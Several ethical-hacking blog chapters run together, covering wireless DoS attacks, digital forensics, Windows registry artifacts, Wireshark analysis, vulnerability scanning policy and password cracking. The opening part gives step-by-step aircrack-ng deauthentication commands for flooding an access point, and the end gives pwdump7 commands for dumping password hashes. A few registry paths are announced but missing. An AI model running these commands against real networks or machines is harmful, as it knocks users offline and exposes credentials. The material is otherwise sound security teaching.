DoS attacks are very dangerous to a network of computers – if your job entails maintaining network security, you would find that a DoS attack is very similar to flooding a house, which means that the longer it takes you to stop it, the more damage it does to the network that you are maintaining. Users on the network would have no means to access the targeted service because the firewall state service is overwhelmed. DoS attacks can also cause reboots or may even lock up entire computer systems.
When an attack involves several network connections in order to launch a DoS attack, then it becomes a distributed denial of service (DDoS) attack. That means that the flooding of information to a targeted service may come at a great speed, thanks to bots or other hackers that are sending thousands of packets at the same time.
How Hackers Perform This Attack
All that a hacker needs to have to perform a DoS attack is a computer, a wireless adapter, and a software called Kali Linux. Take note that Kali Linux runs as an .iso so make sure that you burn it into a CD first.
Now that you have your tools ready, follow the following steps to perform a DoS attack on a wireless LAN:
1.Pull up Kali Linux and select aircrack-ng from the Top 10 Security Tools tab. Once you pull up a fresh terminal, check if your wireless adapter is functioning. To do this enter the following command: iwconfig. After doing this, you may see that your wireless adapter is set as wlan0
2. Place the wireless adapter in monitor mode. Key in the command “airmon-ng start wlan0”.
3. Monitor all available access points and find your target service
You will need to find the BSSID of the access point that you want to attack and copy it, along with the channel of the access point that it is using. To do this, enter the following command: airodump-ng mon0
4. Connect to the target access point
If you are able to connect to the access point, you would be able to see that at the bottom of the screen. You can use the following command to connect to the access point: airodump-ng mon0 —bssid (BSSIDaddress) —channel (access point’s channel)
5. Get the MAC address of the target
Now that you are connected to the target access point, you would need to get the MAC address of the target access point. Copy the MAC address that you see right beside the BSSID of the target that you just connected to.
6.Do a broadcast deauthentication
This is similar to the step that you have done in the earlier blog – you would be bumping off the users from the access point in order to deny service to them. To do that, you would need to send out thousands of de-authenticating frames to the target access point until it breaks down.
Pull up a fresh terminal and enter the following command: aireplay-ng —deauth 1000 -a (BSSID) -h (MAC Address) mon0
7. Keep sending packets if the service still did not break down. Take note that this can be a long process, but once the service is no longer able to contain the incoming traffic of packets, all users that are trying to connect to the access point would not be able to log in, or would get disconnected immediately.
Now, you might notice one behavior exhibited by hackers when they choose their targets and launch their attacks: they always do a scan of the targeted system’s vulnerability. In the example above, you noticed that you are doing a scan for the connection names of your target so that you would know what access point to hit. In other DoS attacks, they search for open ports that are vulnerable to accepting incoming traffic.
What will happen when attackers know the ports of your system? Getting your hands on that knowledge means being able to identify all the services that your computer has, and the exact location of your computer’s vulnerability. Open ports welcome traffic because they are unsecured, and immediately prompt any hacker that that happens to be in the area that it’s fine to launch thousands of packets in.
Here is some good news if you are worried about open ports: it is possible for you to know that someone is poking through open ports through the use of an Intrusion Detection System (IDS). These tools are normally used by websites and commercial servers and they function as an alert system to system administrators whenever too many packets are being bounced in and out of ports, which is a telltale sign of a port scan.
IDS are normally equipped with threshold-level alerts, which means that system admins would become immediately alerted when there are waves of packets that are being sent to port terminals. When you get an alert that there is someone flooding any of your service, then you know that it is time to investigate your traffic.
Other Types of DoS Attacks
To have an idea of what you may be dealing with when you notice that there are large amounts of data being sent to you, it’s necessary to be familiar with the most common DoS attacks. Here are some of the most exploited types:
This is also known as smurf attack, ping of death, b flood, or SYN flood. As the name suggests, this involves sending an overwhelming number of ping packets until the web server exceeds its bandwidth. This is done by creating a fake sender address and then masking that as the sender of mass data.
Since the address is not correct, the web server that responds to ping requests would contain half-open connections since it cannot send the TCP/SYN-ACK packet that it needs to deliver to the requesting party. The result would, of course, be traffic saturation and the inability of the server to accommodate legitimate ping requests.
This attack is also known as the layer 7 DDoS. This type of flooding aims to exploit buffer overflows which are software related. This works by sending thousands of requests to an application, which would result in precious CPU resource being wasted.
3. Peer-to-Peer attack
This type of attack involves massive connections to a website at once, which would cause the web server to crash. You can think of it like a network zombie attack, wherein several bot accounts or computers send thousands of requests to a web server for a connection, forcing the target to go beyond capacity.
How to Stop a DoS Attack
As you may have noticed, this type of attack may come in waves and can take a long time before putting a targeted service down. That means that you would have time to stop volumetric attacks before your system gets flooded with packets.
The best way to prevent a DoS attack from destroying your service is to have knowledge of what is happening in your network, especially if you notice strange behavior in the services that you are monitoring. You can sample the flow that gets into your system ports and predicts trends in incoming traffic. Take note that flow analysis can take up time, and it may require you to sample more than one packet that goes into your ports to know the type of data that flows in.
If you manage to sample enough packets while an attack is going on, then you have plenty of opportunities to know more about the attack and the attacker. If you are suffering from a DoS attack on your wireless connection, you are aware that all users are getting bumped off repeatedly whenever they try to connect. That gives you an idea that, most likely, someone is feeding your connection several deauthentication packets with the intention of sending them in great speed until your system goes over the limit.
If you detect several connections feeding you unrelated data, then you know what to do: bump them off from your network and secure the vulnerable entry point that the hackers found.
Introduction to Digital Forensics
Ethical hackers are known to be experts when it comes to knowing where an attack is coming from and identifying types of computer crime. For this reason, it is very important for them to know any possible way to attribute an act of criminal hacking to its perpetrator and also prevent any damage that may occur on their system. Simply put, ethical hackers should know how digital forensics work.
Defining Digital Forensics
Digital forensics is the field of hacking that is dedicated to determining any form of digital intrusion. This area of interest relies on the fundamental hacking concept that any digital crime creates a footprint that can be linked back to a hacker. These footprints may be found in log files, registry edits, malware, traces of deleted files, or hacking software. All these footprints serve as evidence to determine a hacker’s identity. Of course, all collected evidence would point towards a hacker’s arrest and prosecution.
It does not mean, however, that criminal hackers are not aware of how digital forensics work. Like how you have been studying how criminal hackers work, they have also been studying how they could possibly leave any traces or set alarms for detection. That means that ethical hacking and black hat hacking are constantly evolving – both types of hacking are continuously trying to find each other’s vulnerabilities.
Tools for Digital Forensics
Learning how to investigate a hacker’s footprints is best when you are using the same tools that are used by a forensic investigator. Here are some of the most effective and commonly used tools to find a criminal hacker.
Yes, Kali can serve as both a tool to test and exploit vulnerabilities, and also detect any intrusion in both hardware and software. Kali Forensics are divided into numerous categories, which are as follows:
1.Ram Forensics Tools
2.Password Forensics Tools
3.Forensic Hashing Tools
4.Forensic Hashing Tools
7.PDF Forensic Tools
8.Digital Anti-Forensic Tools
9.Anti-Virus Forensic Tools
11.Forensic Analysis Tools
12.Forensic Craving Tools
The Sleuthkit Kit (TSK)
If you aim to go for commercial-grade digital forensics that is being used by law enforcement and other digital security companies, you can go for the following tools:
1.Guidance Software’s EnCase Forensic
2.Access Data’s Forensic Tool Kit (FTK)
Take note that these tools may require payment for some of their reporting features, and of course, these payments are on top of your subscription. Truth be told though, you are mainly paying for their nice interface and their user-friendliness. At the same time, these tools are also great for training, reporting, and certifying.
All digital forensic tools follow the same logic, whether they are open-source or paid. They would all require you to have a better understanding of what a hacker system looks like and how all hacking activities may potentially leave a mark on everything that has been intruded or destroyed. For this reason, it does not matter what tools you are using, as long as you understand how a target and a hacker system works.
What You Can Do With Digital Forensics
If you aim to be an expert in the field of digital forensics, you would be able to do the following in no time:
1.Determine the time when a particular file was modified, created, or accessed
2.Track a location of a cellular phone device, regardless of whether its GPS is enabled or not
3.Determine all the websites that a hacker has visited, along with all the files that he has downloaded
4.Extract any form of data from the volatile memory
5.Determine who hacked a wireless network and identify all other unauthorized users of a client network
6.Trace a malware using its components and digital signature
7.Crack passwords of encrypted files, hard drives, or patches of communication that the hacker may have left behind
8. Determine the type of device, computer, or software that may have created a malicious file or have launched an attack.
9. Find out what commands or software that a hacker has used within a client system
10. Find out the device, time, or location involved in a screenshot or a photograph
Digital forensics can achieve more than what’s on this list, and for that reason, hackers are busy trying to build tactics that may counter what a forensics investigator may do to evade punishment. Because of the advancement of digital forensics and law enforcement, hackers have created another field of hacking, which is anti-forensics.
What is Anti-Forensics?
Anti-forensics, as the name implies, is the branch of hacking that specializes in evading all techniques and tools that a digital forensics investigator may use. Some of the techniques that this branch of hacking employs are the following:
1. Trail obfuscation – this is the practice of misleading digital forensics into following another attack source, rather than finding the attack itself
2.Timestamp alteration – this is the practice of changing the timestamp that investigators see when they check when a file was modified, access, or changed
3.Artifact wiping – this practice ensures that all attack fingerprints done by a criminal hacker’s computer is erased from a target computer to prevent detection.
4. Data hiding – this includes encryption of any possible artifact or steganography (the process of hiding a code or a secret message in a file or document that can be easily found)
Now that you have a clearer idea on how you can find attacks and attackers, and you know how they can also counter the tools that you would be using, you should understand that dealing with criminal hackers is not that easy. Your goal is to outsmart them by thinking ahead and having the foresight of knowing what they would probably do next. By being able to predict what they can do to counter your forensic tools, you can switch to a different tactic and prevent any other attack.
Windows Registry and Forensics
Since you are now aware that hackers leave trails on their target’s computer that can be linked back to theirs, it is high time that you know how to actually find these trails for evidence.
Here is something that most newbie hackers are not aware of – if they are attacking a Windows operating system, they are leaving most, if not all, of their artifacts in a single location. This location is called the registry.
What the Windows Registry Does
Almost all Windows users know that there is such a thing called Windows Registry in their system, but only a few understand how to locate and manipulate it. For a forensics investigator, the registry is the home of digital evidence, since it houses all information that tells when, where, what, and how any change in the system happened. More importantly, it can tell which user initiated the change, and how it happened.
Within the Windows, Registry is five root folders, which are referred to as hives. HKEY_USERS – houses all the user profiles that are loaded into the operating system
HKEYCLASSES_ROOT – contains all config information on any application that is used to open files
HKEYLOCAL_MACHINE – contains all config information, including every software and hardware set
HKEYCLASSES_CONFIG – contains hardware configuration profile of a client system upon startup
When you type “regedit” on the Windows search bar, you would be able to launch these root folders and their subfolders, which are called subkeys. These subkeys would show descriptions and values on the right pane. The values that you may see are either 0 or 1, which means on or off, and the more complex information is often displayed as hexadecimal values.
From this, you would see the following information and more:
1.All devices that have been mounted on the system, including flash drives, external hard drives, cellular devices, keyboards, or speakers
2.List of all files that have been accessed and when they were last opened or modified
3.When the system connected to a specific access point
4. Most recently used software
5.User profiles and the last instance they used the system
6. All searches are done on the system
Since you are now aware of what you can find in your operating system’s registry, all you need to know is to learn where you can find information that may have been left during an unauthorized access or attack in the computer that you are investigating.
If you suspect that your computer has been breached, the first thing that you would want to know is if an unauthorized user has accessed any of your sensitive files. You can find that out by accessing this location:
If you are trying to see whether an attacker has accessed a Word file, all you need to do is check the list of the .doc or .docx files that have been recently accessed, which can be pulled up by clicking the appropriate subkey on the left pane. If you pulled up the document that you want to investigate, you would see that the data is in hex at the left side, and then ASCII on the right.
Now, if you are trying to find any evidence of a possible breach, you would want to find any file that may be unrelated to your system. Here’s an example: a .tar is uncommon for a Windows OS, but can be usually found in a Linux or Unix system. Its job is similar to a .zip file, but what could it be doing there in your file directory?
It is possibly a malware that unpacks when triggered. You can check the contents of the .tar file to get more information about an attack or the one who launched it.
Typed URLs Key
When you run a URL in Internet Explorer, that specific information is also stored in your registry at this path:
If you are not using this browser to surf the Internet, it is very likely that the attacker is using IE to launch an attack by downloading a malware. It may also reveal what the user was looking at or was trying to find when the attack was launched.
Stored IP Addresses
The registry makes sure that it holds all the IP addresses of all users that it connects to, including all the interfaces that have connected to the targeted computer.
When you look at the list of IP addresses, you would find all addresses assigned in all interfaces, including details about the time when the DHCP server leased them. If you suspect that your computer was attacked through an access point, you can also see the IP address assigned to your suspect during the time of the intrusion.
Forensic investigators make sure that they are aware of all applications and services that are triggered to start whenever the targeted computer boots. An example of a file that may run during startup would be a malware or a listening payload that needs to run in order to keep an attacker connected to his victim’s device. Knowing this information would also make you aware that there are several other locations in the computer that are infected by the same file, which tells you the locations that the attacker wants to monitor.
The most-used location for hackers is this:
When a malware is attached to your computer in this location, it would be set to run every time you start your computer, along with other software or directories that are linked to this path. For this reason, this path is also the best location to make sure that rootkits and other types of malicious software are running.
If you suspect that a file that only needs to run once during startup infects your computer, you would most likely find the suspected file here:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup Services
You would sometimes notice that there are several services in your computer (particularly the ones that you need to deter intrusions) that do not seem to load during startup. If you want to see if the settings have been altered to let a malicious file in without your knowledge, you would find the information in this path:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services Start When a Specific User Logs In
If you suspect that strange behavior in your computer happens only when a particular user logs into your system, then you can check if a particular service or file is set to run in this path:
Of course, a skilled criminal hacker should have knowledge on how to use this information to conceal his tracks. For this reason, it would be wise to make sure that you’re familiar with a few good tools that an attacker may have his hands on. It’s also advantageous to be fully knowledgeable of your operating system’s current state.
Going Undercover in Your Own Network
You are aware that there are a number of attacks launched using the network, which means that hackers do consider access points to be among the most vulnerable aspects of any information technology fortress. If you remember the Heartbleed incident, you would realize that even top corporations can be easily exploited over the network, even causing their more advanced systems to suddenly spit out confidential and encrypted information about their clients. If they are vulnerable, then so are you.
If you suspect that your system has been attacked over your network, or that someone has made an announcement that they are going to hack you, then you have all the right reasons to monitor what is going on in your network and try to find out who your attacker might be. In this blog, you would also learn what a forensic investigator may gather about an attacker during a network investigation exploitation.
Example Problem Scenario
Your browser is behaving badly and your homepage keeps on redirecting to a page that tells you that your computer is infected with a virus, and then prompts you that you need to purchase a specific antivirus program. In addition, your computer also starts lagging and you see that there are too many ads that are popping up. Not only does this disrupt your work, but it also eats up the resources of your computer.
At this point, you are certain that your computer has been infected. You want to know what it is, and where the infection came from.
If you already have Kali Linux (yes, the tool suite that can also be used to launch a network attack), then you already have this tool. You can find it in the Network Traffic Analysis drop-down menu. This interface is capable of creating a live capture on your network’s traffic and then analyze the information that is being sent and received on your access points.
Launch Wireshark and do a live capture. You can do that by clicking Capture (found at the menu at the top), and then selecting the active interface. You will see that there are three windows on your screen. The windows on the upper portion will tell you about the packets that you are receiving, and you will also be given some information about them.
The middle window will show you all the bits in your traffic and the packet header’s bytes. The lower windows will show you the packet contents both in ASCII and hexadecimal.
If you look at the contents of the packets, you would probably see that there is a messenger packet coming from a device somewhere in the World Wide Web. You can have a closer look at this packet when you click on it and then inspecting the details that will appear in the white middle window.
If you are aware that messenger services on your network are disabled, you would see that there would be no other activity should be happening. However, you may notice that there is an ICMP packet in the list that says that it is unreachable by your request. This is most likely a suspicious activity.
Scan the Traffic then Filter It
If you are online, you would see that your computer is receiving a lot of traffic. However, with a device like Wireshark, you would be able to select traffic that you are interested in to verify the data that you are receiving. At the same time, you can also check packets and filter the safe from the suspicious ones.
For example, you may see that you are receiving traffic from your reliable antivirus program. When that happens, you can remove that from all the other packets that you see in the window since you are already aware that that specific traffic is coming from a reliable device. To filter the ones that you have already inspected and remove them from view, use this syntax:
!ip.addr == (IP address of traffic)
After doing that, you can focus your attention to other traffic that can be potentially harmful to your computer.
Start Looking at DNS Queries
Check the other traffic that you see on the window. You would probably see that your computer (check for your IP address) is doing standard queries using a DNS protocol to a site that you do not remember accessing while you were using your computer. If you are aware that you are not currently viewing a site and your computer behaves this way, then you can rule that as a suspicious activity.
Now check the other packets. If your computer’s host appears to be requesting downloads from an unknown site, then it is very likely that your computer has a rootkit and the malware is reporting back to its source! The good thing is that you already know where the rootkit is coming from, and you can run a malware scan to remove it from your system.
Should you think that you are incurring serious damage because of the rootkit, you can save the results to serve as evidence against the culprit once you report them to authorities.
Detecting Possible DoS Flood Signatures
Since you read about DoS attacks in an earlier blog, you might also be very interested in how you can possibly see if your ports are being flooded by a hacker with the attempt to deny your service. If you have Wireshark, you can detect the signs of possible waves of packets that are possibly being sent to you by a criminal hacker.
Here’s a typical scenario for packet floods such as DoS attacks – if a criminal hacker wants to flood you, he would want to conceal his identity by spoofing IP addresses for each type of packet that he wants to send you. The reason why criminal hackers do this is that they are very aware that it is very easy for many commercial firewalls to detect flooding from a single source and then proceed to blacklist that IP.
Of course, if the huge wave of traffic looks like it is coming from a single source in a small amount of time, then you can just stop the connection coming from that address.
When detecting a DoS attack, you can run a Wireshark capture and look at the ports that are receiving traffic. If you see that there are too many IPs that are sending traffic to a single port and that the packets that they are sending are coming to you in suspiciously small intervals, then you know that someone is trying to destroy (or at the very least, bog down) your network.
Making Sure that Your Network is Safe
By making sure that you are aware whenever someone is trying to send you a port scan, you would be able to secure your network and prevent any network-related attack. The only proven way to do this is to have a person monitoring the traffic that is coming into your system, and then making sure that all data requests coming online are legitimate. Once there is a suspicious activity going on, then it is time for you, the ethical hacker, to carry out the next step in thwarting a possible attack.
What could you possibly do during a possible attack? You can simply try to find all the suspicious incoming connections and then ban them from connecting to you. This way, you would not have to deny service to anyone who should really be accessing your network – and this is of importance if your business depends on being able to offer access. In other words, you should always consider the possible repercussions of every step you take against possible attacks
Conducting Vulnerability Scanning
A vulnerability is a weakness or lack of protection present within a host, system, or environment. The presence of a vulnerability represents a potential spot for exploitation or targeting by a threat. Locating and identifying vulnerabilities in a system represents one important component of protecting a system—but not the only one.
How do you find all the vulnerabilities that exist in an environment, especially with the ever-increasing complexity of technologies? Many techniques can help you; some of them are manual or scripted in nature (many of which we have already discussed), and some are automated tools such as vulnerability scanners.
Vulnerability scanners are designed to identify problems and “holes” in operating systems and applications. This is done by checking coding, ports, variables, banners, and many other potential problems areas, looking for issues.
A vulnerability scanner is intended to be used by many legitimate users, including pentesters, to find out whether there is a possibility of being successfully exploited and what needs to be fixed to mitigate, either by reducing or eliminating the threat area. While vulnerability scanners are usually used to check software applications, they also can check entire operating environments, including networks and virtual machines.
In this blog, you’ll learn how to
Understand the purpose of vulnerability scanning Know the limitations of vulnerability scanning
Go through the vulnerability scanning process Choose a type of scan
Introduction to Vulnerability Scanning
Vulnerability scanning is a process that can be included as part of pen testing or can be performed entirely on its own. The purpose of this type of scan is to locate and identify vulnerabilities on a target and provide information to the initiator of the scan. When performed properly and regularly, a vulnerability scan can provide valuable information about the security posture of an organization’s infrastructure, including its technical and management policies.
Many companies choose to use vulnerability scanners because they can readily identify many common security issues. This is done by checking coding, ports, and many other aspects of the targeted area to reveal any possible problems that an attacker may use to their advantage.
A vulnerability scanner is used by many legitimate users to find out if there is a possibility of being exploited and what needs to be done to reduce any threat. At the same time, hackers use these scanners to know just where to attack. While vulnerability scanners tend to be used most often with programs, they can check an entire computer, networks, and virtual machines.
Hackers have many ways of sneaking into a computer; they can come in through weak coding, via an open port, or through a program with easy user access. To keep the possibility of being hacked to a minimum, companies use a vulnerability scanner. The user may specify a target area, so the program scans just one part of the computer, sifting through everything within that area to reveal problems. Some programs can fix minor errors automatically, though most just report the problems.
The primary users of vulnerability scanner software are legitimate and are mostly businesses. Basic users tend to lack the knowledge to properly fix problems, so vulnerability scanners are usually not designed for them. These programs are made more for businesses and large networks, where vulnerability can cause the direct loss of money or the loss of trade secrets, which can be costly.
Pentesters tend to find benefit with these utilities because they can reveal vulnerabilities that can be leveraged during their work and provide information for a report to the client. A vulnerability scanner is most often used on custom programs or web applications— programs that involve many people working simultaneously—because these programs can present a security threat.
Vulnerability scanners also are made for whole computers, networks, ports, databases, and virtual machines. Some scanners are made to scan many different target areas, whereas some will just be able to check one aspect of a computer.
Recognizing the Limitations of Vulnerability Scanning
Vulnerability scanning has long been used as an old standby in the toolkit of the security professional. However, while it is a valuable tool and will continue to be an important part of the security pro’s toolkit, it also has its limitations, which you need to understand to properly apply the technology to its utmost.
Remember that vulnerabilities are an ongoing problem that can be mitigated, but constant reassessment needs to be done in order to make sure that any new issues that appear are dealt with in a timely fashion (and at the very least noted to keep track of the current security issues on the network).
Another important point to remember with these scanners is that an IT admin or security pro running scans with these tools should not be lulled into a false sense of security if their scans reveal no issues of concern.
Vulnerability scanners come in different forms, each able to perform a unique type of scan against a targeted system. At the low end, some scanners only include the ability to perform checks of a system’s configuration, including patches and software version information. At the higher end, vulnerability scanners can include a wealth of powerful features such as advanced reporting, analysis features, and other helpful abilities.
No matter their feature set and overall capabilities, most scanners use a model similar to that of antimalware packages. In most cases, scanners rely on the use of a database of known vulnerabilities that must be regularly updated by downloading new versions of the database from the vendor’s website.
Much like getting a booster shot for tetanus, however, regular updates must be applied or the software will quickly lose its ability to detect newly emerging threats, thus increasing the risk of a security breach due to an undetected breach being exploited. In fact, a scanner that is not regularly updated will become essentially worthless if it is not updated over a long period of time.
A bigger issue still with scanners is that it is possible to get overconfident even with all current updates and other tasks done to keep the software up to date and current. Some users of these packages believe that the results of a report represent all the vulnerabilities in an environment, and thus a report that is reviewed and addressed as required means that everything that can be done has been—but this is simply not the case.
In fact, vulnerability scanners will only report on those items it has the ability to detect, which still leaves the chance for a lot of potential issues to be missed. The situation is somewhat like believing that a walk around a building and looking for problems means you have found all potential vulnerabilities when this is not the case—in fact, you could have easily overlooked something.
Finally, another easy issue to overlook with scanners of this type is that they only need to be used when a problem is mentioned in a news article or other source. In fact, scans must be run regularly in order to properly catch problems as well as ensure that current measures are working to keep the environment working properly and safely.
Depending on which compliance mandates your company falls under, vulnerability scanning may need to be run on a set schedule and verified. For example, the Payment Card Industry Data Security Standard (PCI DSS) requires that periodic vulnerability scans be performed, so any organization that stores, processes, or transmits credit card data is expected to perform vulnerability scans.
Outlining the Vulnerability
Vulnerability scanning is typically implemented as one of many tools to help an organization identify vulnerabilities on their network and computing devices. The results of the scan will help management make informed decisions regarding the security of their networks and the devices attached to them. Vulnerability scanning can be used on either a small scale or a large scale, depending on the assets and systems that need to be assessed.
Although numerous tools are available that can provide insight into the vulnerabilities on a system, not all scanning tools have the same set of features. Each scanning tool may or may not cover the same list of vulnerabilities that another may assess. As such, an organization should carefully choose which scanners they wish to use and then designate that the use of any other vulnerability scanner must be justified and approved prior to use.
Any scanning tool should be capable of assessing information systems from a central location and be able to provide remediation suggestions. It must also be able to assign a severity value to each vulnerability discovered based on the relative impact of the vulnerability to the affected unit.
Conducting a Periodic Assessment on Existing Devices
Ideally, each department or departments should be required to conduct an assessment of their networked computing devices on a regular schedule. At the very least, every department should run fully authenticated scans on a set schedule (such as monthly or quarterly). These scans should be tailored to assess the unique needs of their department and should be run against all assets that are within their own unique areas of control.
An example would be monthly scans required for the following networking computing devices:
Any computing devices that are known to contain sensitive data
Any computing devices that must meet specific regulatory requirements such as HIPAA
All file system images or virtual machine templates used as base images for building and deploying new workstations or servers
All devices that are used as servers or used for data storage Any network infrastructure equipment
The approved vulnerability scanning tool must be used to conduct the scans unless otherwise authorized
Scans should always be performed (in most cases) with the business’s unique needs in mind. Keep in mind that vulnerability scans can and will slow down the network and the devices or applications they are tasked with assessing. If scans are done during business hours, care should be taken to minimize the potential disruption that could be caused as a result of the scans. Scans should be conducted during off-peak hours, along with an additional second scan to catch non-compliant clients or clients that were shut down to be rescanned again.
The computing device or system administrators should not make changes to networked computing devices for the sole purpose of passing an assessment. Additionally, no devices connected to the network should be specifically configured to block vulnerability scans.
Vulnerabilities on networked computing devices should be addressed based on the results and the needs of the business. Keep in mind that not all the vulnerabilities revealed by the scanning engine need to be addressed.
Conducting a New System Assessment
No new system should be put into production until a vulnerability assessment has been conducted and vulnerabilities addressed.
Each department should be directed to conduct vulnerability assessments at these times:
Upon completion of the operating system installation and patching phase
Upon completion of the installation of any vendor-provided or in-house–developed an application
Prior to moving the information system into production
Upon completion of an image or template designed for deployment of multiple devices
Upon delivery of vendor-provided information systems, prior to user acceptance testing, and again before moving into production
For new network infrastructure equipment, during the burn-in phase and prior to moving to production
At the completion of each of these vulnerability assessments, all discovered vulnerabilities must be documented and remediated.
Understanding What to Scan
Departments should not conduct intrusive scans of systems that are not under their direct control:
Departments are responsible for ensuring that vendor-owned equipment is limited in those vulnerabilities that can harm the enterprise.
The vendor must be informed and permitted to have staff on hand at the time of scans.
Vendors should not be permitted to conduct scans of information systems without the express permission of the department and management. Networked computing devices that appear to be causing disruptive behavior on the network may be scanned using nonintrusive methods to investigate the source of the disruption.
At the conclusion of each assessment, each department should maintain documentation showing
All discovered vulnerabilities, the severity, and the affected information system(s)
For each discovered vulnerability, detailed information on how the vulnerability will be remedied or eliminated
The reports produced by the enterprise vulnerability scanning tool, which should be evaluated for their suitability for this documentation. As part of the yearly security scanning process, departments will be required to document vulnerability scanning and remediation efforts based on that documentation.
Discovered vulnerabilities will be remediated and/or mitigated based on rules such as the following examples:
Critical vulnerabilities will be fully addressed within 15 calendar days of discovery.
High vulnerabilities will be fully addressed within 30 calendar days of discovery.
Medium vulnerabilities will be fully addressed within 60 calendar days of discovery.
Low vulnerabilities will be addressed within 90 calendar days of discovery.
Vulnerabilities are considered remediated when the risk of exploitation has been fully removed and subsequent scans of the device show the vulnerability no longer exists. Typically this is accomplished by patching the operating system/software applications or by upgrading software.
You have gathered a lot of information through your scanning, information-gathering, and enumeration processes—information such as usernames, groups, passwords, permissions, and other system details. Now you will use that information to dig into a system and gain access.
This step represents the point where you try to gain entry to a system with the intent of compromising it or gaining information of some sort. What you need to remember is that this process is reasonably methodical; it includes cracking passwords, escalating privileges, executing applications, hiding files, covering tracks, and concealing evidence. This blog covers cracking passwords.
In this blog, you will learn to: Know good passwords from bad ones Crack a password
Recognizing Strong Passwords
Passwords are the most widely used form of authentication in the world, so they are a prime target for attack. Usernames and passwords are used on computer systems, bank accounts, ATMs, and more. The ability to crack passwords is a required skill for you as a pentester because they are an effective way to gain access to a system.
The ways to compromise a password are varied, meaning you have plenty of options open to you. You can compromise a password by exploiting anything from social engineering to defective storage to poor authentication services. To ensure you understand the cracking process better, let’s examine the characteristics of a strong password.
Passwords are intended to both be easy to remember and not easily guessed or broken. Although it may seem that these two goals are in conflict, in actuality they are complementary. One of the problems, however, is that when seeking the “perfect” password, many individuals choose something that is easy to remember and that can make it easy to guess.
Some examples of passwords that lend themselves to cracking include the following:
Passwords that contain letters, special characters, and numbers: stud@52
Passwords that contain only numbers: 23698217
Passwords that contain only special characters: &*#@!(%)
Passwords that contain letters and numbers: meetl23
Passwords that contain only uppercase or only lowercase:
Passwords that contain only letters and special characters: rex@&ba
Passwords that contain only special characters and numbers: 123@$4
Passwords of 11 characters or less
You may already be aware of some or all of these rules seen on this list as they are commonly recommended guidelines in corporations and when setting up any sort of password for any reason. Remember, a password with one of the points of this list is bad; a password exhibiting more than one of the points on this list is even weaker.
Choosing a Password-Cracking Technique
Numerous techniques are used to reveal or recover a password. While each takes a slightly different approach, they all can yield a password.
Dictionary Attacks Attacks of this type take the form of a password-cracking application, which employs a list of commonly used potential passwords pre-loaded (or manually) loaded into it via a text document. The cracking application uses this file to attempt to recover the password by using the words on this list.
The list helps to accelerate the cracking process by allowing the attacker to get a head start on words that are commonly used as passwords. These lists can be downloaded for free from many websites, some including millions of words.
Brute-Force Attacks In this type of attack every possible combination of characters is attempted until the correct one is uncovered. While this attack has the ability to be successful, many modern systems employ techniques such as account lockouts and bad login counts (called a threshold) to stop this approach from being successful.
Usually, thresholds have a set limit of three to five attempts. After the limit has been exceeded, the account will be locked out and will require an administrator to reset the password on the account.
Hybrid Attack This form of password attack builds on the dictionary attack but with additional steps as part of the process. For instance, it can use a dictionary attack but add extra common components such as a 1 or ! at the end.
In addition to those techniques, there are four different types of attacks, each of which has a different approach to recovering and uncovering a password. Typically, the various password-cracking techniques are broken down even further into the following types:
Passive Online Attacks Attacks falling into this category are those that are carried out simply by sitting back and listening. One technique for accomplishing this is by tapping into the network and using a technology known as a sniffer to observe the traffic looking for passwords.
Active Online Attacks This category of attack is more aggressive than passive in that the process requires deeper engagement with the targets. Attacks in this form are meant to more aggressively target a victim with the intention of breaking a password.
Offline Attacks This type of attack is designed to prey on the weaknesses not of passwords, but of the way they are stored on systems. Since passwords must be stored in some format, an attacker will seek to obtain the credentials.
Nontechnical Attacks Also known as nonelectronic attacks, this type of attack moves the process offline into the real world. Typically attacks of this type are squarely in the form of social engineering or manipulating human beings. A closer look at these attacks will reveal some insights that you can use later.
Executing a Passive Online Attack
A massive online attack is an attack where the individual carrying out the process takes on a “sit back and wait” attitude. The overall effectiveness of this attack depends partly on how quiet the attacker can be as well as how weak the password system itself is.
Network Sniffing or Packet Analysis
A packet sniffer is something that we will dedicate more time to later, but let’s bring up the topic briefly here as a means to obtaining a password. A sniffer is a piece of software or hardware that can be used to listen to and observe information or traffic as it passes over a network. Typically used for performing network diagnostics, packet sniffers can be used for more mischievous purposes in the form of stealthily listening in on network activity.
What makes sniffing an effective means of gathering information? Well, in many cases it is the use of insecure protocols such as FTP, Telnet, rlogin, SMTP, and POP3, among others. In many cases, these protocols are either being phased out or are being supplemented with additional security measures via other technologies such as SSH. Either way, many networks still implement legacy protocols that can leave passwords in plaintext and vulnerable to being picked up by an attacker.
Interestingly enough, it’s not just older protocols that are vulnerable; some of the new ones are too. For example, the protocols used by Voice Over IP (VoIP) have been shown to be vulnerable to sniffing. In some cases, calls can be intercepted and decoded with a sniffer.
This type of attack takes place when two different parties communicate with one another with a third party listening in. Once this party starts to listen in, they pick a point to either take over the connection from one of the original individuals or choose to alter the information as it flows between the two. The act of listening in would be passive, but once the attacker alters the packets, we quickly move into the active side.
This type of attack is particularly useful and takes advantage of the same protocols that are vulnerable to sniffing. Protocols such as Telnet and FTP find themselves particularly vulnerable to this type of attack, partly because they transfer authentication data (username and password) in the clear.
Executing an Active Online Attack
The opposite of passive is active, and in this case, we are talking about active online attacks. Attacks that fit into this category are those that require direct interaction with a system in an attempt to break a password. These attacks have the advantage of being faster in many cases, but they also have the downside of being less stealthy and therefore more likely to be detected.
While decidedly low-tech, password guessing is a valid and somewhat effective form of obtaining a password. During this process, an attacker will attempt to gain a password by using a piece of software designed to test passwords from a list imported into the application. During the process, the application will attempt all variations, including case changes, substitutions, digit replacement, and reverse case.
Malware is a tremendously effective way of compromising a system and gaining passwords and other data. Specifically, malware such as Trojans, spyware, and keyloggers can prove effective, allowing for the gathering of information of all types. One form is keyboard sniffing or keylogging, which intercepts the password as a user is entering it. This attack can be carried out using hardware- or software-based mechanisms and can potentially gain all sorts of information during the process, not only passwords.
Executing an Oﬄine Attack
Offline attacks represent a form of attack that is not only effective but can be difficult to detect. Offline attacks rely on the attacking party being able to retrieve the password without directly engaging the target itself.
Let’s take a look at an offline attack and extract a hash from a system.
1. Open the command prompt
2. Type pwdump7.exe to display the hashes on a system.
3. Type pwdump7 > C:\hash.txt.
4. Press Enter.
5. Using Notepad, browse to the C: drive and open the hash.txt file to view the hashes.
Precomputed Hashes or Rainbow Tables
A newer and more advanced technique to perform an advanced offline attack is through precomputed hashes, commonly known as rainbow tables. Rainbow tables are the end result of a process where every possible combination of characters is generated within certain limits.
